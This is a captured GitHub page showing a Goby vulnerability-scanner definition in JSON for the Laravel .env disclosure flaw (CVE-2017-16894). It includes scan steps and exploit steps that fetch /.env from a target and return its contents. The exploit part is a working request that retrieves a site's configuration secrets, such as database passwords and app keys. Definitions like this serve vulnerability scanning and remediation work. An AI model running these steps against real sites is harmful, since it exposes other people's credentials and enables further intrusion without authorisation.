mirror of https://github.com/qwqdanchun/Goby.git
78 lines
2.8 KiB
JSON
78 lines
2.8 KiB
JSON
{
|
|
"Name": "Laravel .env configuration file leaks (CVE-2017-16894)",
|
|
"Level": "1",
|
|
"Tags": [
|
|
"Information leakage"
|
|
],
|
|
"GobyQuery": "app=\"Laravel-Framework\"",
|
|
"Description": "Laravel framework is a PHP based web application development framework developed by Taylor otwell software developer. An information disclosure vulnerability exists in laravel framework 5.5.21 and earlier. Env files can be downloaded. Remote attackers can use this vulnerability to obtain sensitive information",
|
|
"Product": "Laravel framework <= 5.5.21",
|
|
"Homepage": "https://github.com/laravel/framework/tree/5.5",
|
|
"Author": "PeiQi",
|
|
"Impact": "<p>The. Env file can be downloaded for information disclosure. Remote attackers can use this vulnerability to obtain sensitive information</p>",
|
|
"Recommandation": "Restrict access to. Env paths",
|
|
"References": [
|
|
"http://wiki.peiqi.tech"
|
|
],
|
|
"HasExp": true,
|
|
"ExpParams": [
|
|
{
|
|
"name": ".env",
|
|
"type": "select",
|
|
"value": ".env",
|
|
"show": ""
|
|
}
|
|
],
|
|
"ScanSteps": [
|
|
"AND",
|
|
{
|
|
"Request": {
|
|
"method": "GET",
|
|
"uri": "/.env",
|
|
"follow_redirect": true,
|
|
"header": {},
|
|
"data_type": "text",
|
|
"data": ""
|
|
},
|
|
"ResponseTest": {
|
|
"type": "group",
|
|
"operation": "AND",
|
|
"checks": [
|
|
{
|
|
"type": "item",
|
|
"variable": "$code",
|
|
"operation": "==",
|
|
"value": "200",
|
|
"bz": ""
|
|
},
|
|
{
|
|
"type": "item",
|
|
"variable": "$body",
|
|
"operation": "contains",
|
|
"value": "APP_NAME",
|
|
"bz": ""
|
|
}
|
|
]
|
|
},
|
|
"SetVariable": []
|
|
}
|
|
],
|
|
"ExploitSteps": [
|
|
"AND",
|
|
{
|
|
"Request": {
|
|
"method": "GET",
|
|
"uri": "/.env",
|
|
"follow_redirect": true,
|
|
"header": {},
|
|
"data_type": "text",
|
|
"data": ""
|
|
},
|
|
"SetVariable": [
|
|
"output|lastbody"
|
|
]
|
|
}
|
|
],
|
|
"PostTime": "2021-04-04 21:40:23",
|
|
"GobyVersion": "1.8.255"
|
|
} |